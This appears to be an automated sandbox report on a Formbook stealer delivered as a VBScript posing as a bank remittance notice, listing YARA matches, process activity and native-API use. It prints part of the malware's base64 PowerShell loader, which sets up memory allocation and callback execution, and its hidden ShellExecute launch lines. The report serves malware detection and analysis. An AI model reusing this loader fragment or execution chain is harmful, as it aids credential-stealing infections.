Source: C:\Windows\SysWOW64\svchost.exe	Dropped file: C:\Users\user\AppData\Roaming\K-NBS4VB\K-Nlogrv.ini			Jump to dropped file

Malicious sample detected (through community Yara rule)

Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAV
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBBAEkAUgBFAEQAIABTAGUAbgBnAGUAbABlAGoAIABWAGUAbgBkAGUAdABhADgAIABUAEUASQBTAFQARQAgAEYAbwBlAGwAZQBsAHMAZQBzAG0AOQAgAGEAbgB0AGkAdAB5AHIAbwAgAFQASQBMAFMAIABCAEwARwBGAFIAVQAgAEIAeQBkAGUAZgA1ACAATQBpAGwAaQA1ACAAQQBwAHAAbwBzACAAcwBvAGYAdABmAG8AbgB0AGUAdAAgAGEAbABrAG8AIABuAG8AbgBtAGEAcgBrAGUAdAAgAE0AbwBkAGkAcwAgAE0AbwBpAHMAIABVAG4AdgBlAGkAbABlAGQAIABVAG4AZQBtAGEAYwAgAGcAYQByAGIAbABlAHMAZgAgAHQAZQBlAG4AYQAgAFMASABVAFQAVABMAEUAIAANAAoADQAKAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAE8AZgBhAHkAdgBlADEADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG4AdABkAGwAbAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACgAaQBuAHQAIABPAGYAYQB5AHYAZQA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAHcAYQB0ADkALABpAG4AdAAgAFIAYQBzAGsAbwA4ACwAcgBlAGYAIABJAG4AdAAzADIAIABPAGYAYQB5AHYAZQAsAGkAbgB0ACAATQBlAHQAegBlAHIAZQBzAHAAZQA5ACwAaQBuAHQAIABPAGYAYQB5AHYAZQA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEIAVQBUAFQARQBSAE0AQQAsAHUAaQBuAHQAIABDAG8AbgB0AHIAYQA2ACwAaQBuAHQAIAB1AG4AZAB2AHIAcABpAGUAdABpACwAaQBuAHQAIABPAGYAYQB5AHYAZQAwACwAaQBuAHQAIABGAG8AbABkAHkAcwB5ADcALABpAG4AdAAgAE8AYgBvAGUAcgA4ACwAaQBuAHQAIABCAEwAVQBGAEYAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAAUgBhAHMAawBvADgAMAAsAHUAaQBuAHQAIABSAGEAcwBrAG8AOAAxACwASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAAyACwAcgBlAGYAIABJAG4AdAAzADIAIABSAGEAcwBrAG8AOAAzACwAaQBuAHQAIABSAGEAcwBrAG8AOAA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABSAGEAcwBrAG8AOAA1ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA2ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA3ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA4ACwAaQBuAHQAIABSAGEAcwBrAG8AOAA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEgAdQB0AHUANwAgAGcAYQByAGEAbgAgAGQAeQBzAGMAaAAgAFUATgBVAE4ASQAgAFMAdABvAHIAIABPAFYARQBSAEkATgAgAGwAaQBmAHQAbQBhACAARQBsAGUAYwB0AHIAbwBkAGkAIABJAHIAcgBpAHQAZQByAGUAdAA0ACAAQgBvAG4AaQBuAGkAdABlADcAIABlAGMAZAB5AHMAbwBuAGEAbgAgAHMAaABhAHIAIABLAGEAcgBhAG4AdABuAGUAcwB0ACAAYgByAHUAdAB0AG8AIABhAG4AdAByAGEAYwBpACAARgB5AHIAbQBlACAATABhAHUAZAByAHUAcAB0AHIAaQA2ACAAZABlAHMAcABvAHQAaQB6ACAAVABlAG0AcABlAGwAawAgAFIAZQB0AHMAcwBpAGsAIABkAGUAbQBvAHUAZABnAGEAdgBlACAAVABBAEMAVABVACAATwBiAGoAdQAgAEwAVQBEAEkAQwBSAE8AVQBTAEMAIABzAHQAdQBtACAAV			Jump to behavior

Potential malicious VBS script found (suspicious strings)

Source:	Initial file: obj1.ShellExecute MyFile , RAVNEAGT ,"","",0
Source:	Initial file: obj1.ShellExecute "powershell.exe", RAVNEAGT ,"","",0

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7837
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 7837			Jump to behavior

Detected potential crypto function

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_035A3121	4_2_035A3121
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_035A0040	4_2_035A0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_035ADA21	4_2_035ADA21
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_035A3121	4_2_035A3121
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_035A3121	4_2_035A3121
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_035AD9D8	4_2_035AD9D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_035AF060	4_2_035AF060
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_035ADD7D	4_2_035ADD7D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_035B23CA	4_2_035B23CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_035B3730	4_2_035B3730
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_035B4DA0	4_2_035B4DA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_035B33D8	4_2_035B33D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_035BD698	4_2_035BD698
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_035BF420	4_2_035BF420
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC76E30	23_2_1EC76E30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC8EBB0	23_2_1EC8EBB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC6B090	23_2_1EC6B090
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC820A0	23_2_1EC820A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1ED220A8	23_2_1ED220A8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1ED11002	23_2_1ED11002
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC6841F	23_2_1EC6841F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC6D5E0	23_2_1EC6D5E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC82581	23_2_1EC82581
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1ED21D55	23_2_1ED21D55
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC5F900	23_2_1EC5F900
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC50D20	23_2_1EC50D20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC74120	23_2_1EC74120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034F2B28	26_2_034F2B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034EDBD2	26_2_034EDBD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_0345EBB0	26_2_0345EBB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034F22AE	26_2_034F22AE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_0342F900	26_2_0342F900
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03444120	26_2_03444120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034E1002	26_2_034E1002
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034F28EC	26_2_034F28EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_0343B090	26_2_0343B090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034520A0	26_2_034520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034F20A8	26_2_034F20A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034F1FF1	26_2_034F1FF1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034ED616	26_2_034ED616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03446E30	26_2_03446E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034F2EF7	26_2_034F2EF7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034F1D55	26_2_034F1D55
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034F2D07	26_2_034F2D07
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03420D20	26_2_03420D20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034F25DD	26_2_034F25DD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_0343D5E0	26_2_0343D5E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_03452581	26_2_03452581
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_034ED466	26_2_034ED466
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_0343841F	26_2_0343841F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02A2E61F	26_2_02A2E61F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02A19E60	26_2_02A19E60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02A19E5B	26_2_02A19E5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02A12FB0	26_2_02A12FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02A12D88	26_2_02A12D88
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 26_2_02A12D90	26_2_02A12D90

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 98%

Java / VBScript file with very long strings (likely obfuscated code)

Source: Remittance Information (MT-103).vbs

Initial sample: Strings found which are bigger than 50

Yara signature match

Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001A.00000002.874088041.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001A.00000002.873877212.0000000002710000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000000.698865578.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001A.00000002.873684957.0000000000550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.729280321.0000000002C20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.729334535.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000018.00000000.716819564.000000000DD15000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Found potential string decryption / allocating functions

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0342B150 appears 35 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: String function: 1EC5B150 appears 35 times

Contains functionality to call native functions

Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC996E0 NtFreeVirtualMemory,LdrInitializeThunk,	23_2_1EC996E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99A50 NtCreateFile,LdrInitializeThunk,	23_2_1EC99A50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99660 NtAllocateVirtualMemory,LdrInitializeThunk,	23_2_1EC99660
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99A00 NtProtectVirtualMemory,LdrInitializeThunk,	23_2_1EC99A00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99A20 NtResumeThread,LdrInitializeThunk,	23_2_1EC99A20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99780 NtMapViewOfSection,LdrInitializeThunk,	23_2_1EC99780
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC997A0 NtUnmapViewOfSection,LdrInitializeThunk,	23_2_1EC997A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99710 NtQueryInformationToken,LdrInitializeThunk,	23_2_1EC99710
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC998F0 NtReadVirtualMemory,LdrInitializeThunk,	23_2_1EC998F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99840 NtDelayExecution,LdrInitializeThunk,	23_2_1EC99840
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99860 NtQuerySystemInformation,LdrInitializeThunk,	23_2_1EC99860
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC999A0 NtCreateSection,LdrInitializeThunk,	23_2_1EC999A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99540 NtReadFile,LdrInitializeThunk,	23_2_1EC99540
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99910 NtAdjustPrivilegesToken,LdrInitializeThunk,	23_2_1EC99910
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC996D0 NtCreateKey,	23_2_1EC996D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99A80 NtOpenDirectoryObject,	23_2_1EC99A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99650 NtQueryValueKey,	23_2_1EC99650
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99670 NtQueryInformationProcess,	23_2_1EC99670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99610 NtEnumerateValueKey,	23_2_1EC99610
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99A10 NtQuerySection,	23_2_1EC99A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99FE0 NtCreateMutant,	23_2_1EC99FE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC9A3B0 NtGetContextThread,	23_2_1EC9A3B0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99760 NtOpenProcess,	23_2_1EC99760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC99770 NtSetInformationFile,	23_2_1EC99770
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe	Code function: 23_2_1EC9A770 NtOpenThread,	23_2_1EC9A770
